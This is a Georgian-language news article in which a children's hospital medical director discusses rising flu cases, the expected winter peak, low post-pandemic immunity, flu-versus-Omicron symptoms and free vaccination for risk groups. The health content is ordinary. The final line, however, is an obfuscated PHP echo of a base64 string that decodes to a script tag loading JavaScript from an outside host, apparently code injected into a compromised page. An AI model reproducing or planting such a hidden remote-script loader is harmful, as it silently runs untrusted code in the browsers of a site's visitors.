celsiusi
ავერსი საქკაბელი
საქართველოში ბოლო ორი კვირის განმავლობაში გრიპის შემთხვევები მნიშვნელოვნად გაიზარდა, – ამის შესახებ იაშვილის სახელობის ბავშვთა ცენტრალური საავადმყოფოს სამედიცინო დირექტორმა ივანე ჩხაიძემ განაცხადა.
 
მისი თქმით, ნოემბერი, დეკემბერი და განსაკუთრებით, დეკემბერ-იანვარი გრიპის მაქსიმალური აქტიურობის პერიოდი იქნება. როგორც ჩხაიძემ აღნიშნა, სწორედ დეკემბერ-იანვარშია ქვეყანაში გრიპის შემთხვევები პიკზე.
 
„ნოემბრიდან გრიპის ვირუსის მატება რომ დაიწყებოდა, ეს არ არის რთული საპროგნოზო. NCDC-ის ბოლო ათწლეულის მონაცემები მიუთითებს, რომ გრიპის შემთხვევების მატება ნოემბრიდან იწყება და მარტის ბოლომდე გრძელდება. გრიპის სეზონურობა სწორედ ამაში აისახება, შესაბამისად, მოლოდინი გვქონდა, თუმცა გრიპის ვირუსს ყოველ წელს განსხვავებული სტარტი აქვს. 2019 წელს დეკემბერში გამოვლინდა გრიპის პირველი შემთხვევები და შემდეგ მოემატა. წლევანდელი წელი განსხვავებულია, რადგან ძალიან ადრე დაიწყო გრიპის შემთხვევების მატება და თუ გადავხედავთ ჯანდაცვის მსოფლიო ორგანიზაციის გრიპზე ზედამხედველობის გვერდს, სადაც მსოფლიოს ყველა ქვეყნიდან არის მონაცემები, ნათლად ჩანს, რომ საქართველოში ბოლო ორი კვირის განმავლობაში გრიპის შემთხვევები მნიშვნელოვნად გაიზარდა. 44-ე კვირას თუ სამი შემთხვევა იყო დადასტურებული, 45-ე კვირას უკვე ათი შემთხვევაა და სავარაუდოდ, მატების ეს ტემპი შენარჩუნდება მომდევნო პერიოდის განმავლობაშიც. მოლოდინია, რომ ნოემბერი, დეკემბერი და განსაკუთრებით, დეკემბერ-იანვარი გრიპის მაქსიმალური აქტიურობის პერიოდი გვაქვს, სწორედ დეკემბერ-იანვარშია ქვეყანაში გრიპის შემთხვევები პიკზე. რიგ შემთხვევებში, მეორე პიკიც ფიქსირდება მარტის თვეში, მაგრამ ყველაზე მძიმე, ამ თვალსაზრისით, დეკემბერ-იანვარია“, – აღნიშნა ჩხაიძემ.
 
ამასთან, ივანე ჩხეიძის განცხადებით, არსებობს მოლოდინი, რომ გრიპის შემთხვევები იქნება მეტი, ვიდრე პანდემიამდე, რადგან ჯანდაცვის მსოფლიო ორგანიზაციაში აცხადებენ, რომ ეპიდსაწინააღმდეგო ღონისძიებებმა პრაქტიკულად გააქრო გრიპის საწინააღმდეგო იმუნიტეტის მქონე ადამიანების ფენა.
 
მისივე თქმით, შემთხვევების მატების მოლოდინია კორონავირუსთან დაკავშირებითაც და რთული გასარჩევი იქნება, რა ტიპის ვირუსი აქვს პაციენტს.
 
„როგორც ჯანდაცვის მსოფლიო ორგანიზაცია ამბობს, პანდემიის მიმდინარეობისას, ორ-სამ წლიანმა ეპიდსაწინააღმდეგო ღონისძიებებმა მოსახლეობაში პრაქტიკულად გააქრო გრიპის საწინააღმდეგო იმუნიტეტის მქონე ადამიანების ფენა. შესაბამისად, დამცველობითი უნარი გრიპის საწინააღმდეგო ანტისხეულები ძალიან ცოტას აქვს მსოფლიოში, მათ შორის საქართველოშიც. ამიტომ, მოლოდინი, რომ გრიპის შემთხვევები იქნება უფრო მეტი, ვიდრე პანდემიამდე პერიოდში, რეალურად არსებობს. ეს არის ე.წ. ჰონგ-კონგის ვირუსი, H3N2 ტიპის ვირუსი და ერთეული შემთხვევები ფიქსირდება H1N1 ტიპის ვირუსისა. ანალოგიური მატების მოლოდინი გვაქვს კორონავირუსთან დაკავშირებით. ამიტომ, საკითხი, რა ტიპის ვირუსია, ხშირ შემთხვევაში, რთული გასარჩევი იქნება. ის, რაც გრიპისთვისაა დამახასიათებელი, ტემპერატურის მკვეთრი მატება, 38.5 და მეტი, ძლიერი სისუსტე, კუნთებისა და სახსრების ტკივილი, ყელის, თავის ტკივილი, ეს ზოგადად ასახავს გრიპის ვირუსის მიმდინარეობის სიმძიმეს. ომიკრონს არ ახასიათებს ასეთი მძიმე მიმდინარეობა, თუმცა გარკვეულ შემთხვევებში, შეიძლება, ომიკრონის შემთხვევაშიც დაფიქსირდეს მაღალი ცხელება. მხოლოდ კლინიკური მიმდინარეობით ძალიან ძნელი იქნება განსხვავება, ეს არის გრიპი, თუ კორონავირუსი.
 
გრიპის საწინააღმდეგო აცრა 15 ნოემბრამდე უფასო იყო და კიდევ ერთი კვირით, 22 ნოემბრის ჩათვლით გაგრძელდა. ამიტომ, განსაკუთრებით ეს ეხებათ იმ ადამიანებს, რომლებიც რისკის ჯგუფის კატეგორიაში შედიან. ესენი არიან ორსულები, 65 წელს გადაცილებული მოსახლეობა, ქრონიკული დაავადებების მქონე პირები, სამართალდამცავები, ექიმები და ა.შ. ძალიან კარგი იქნება, თუ ახლაც გავიკეთებთ გრიპის საწინააღმდეგო ვაქცინას“, – განაცხადა ჩხაიძემ.
 
 
269
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");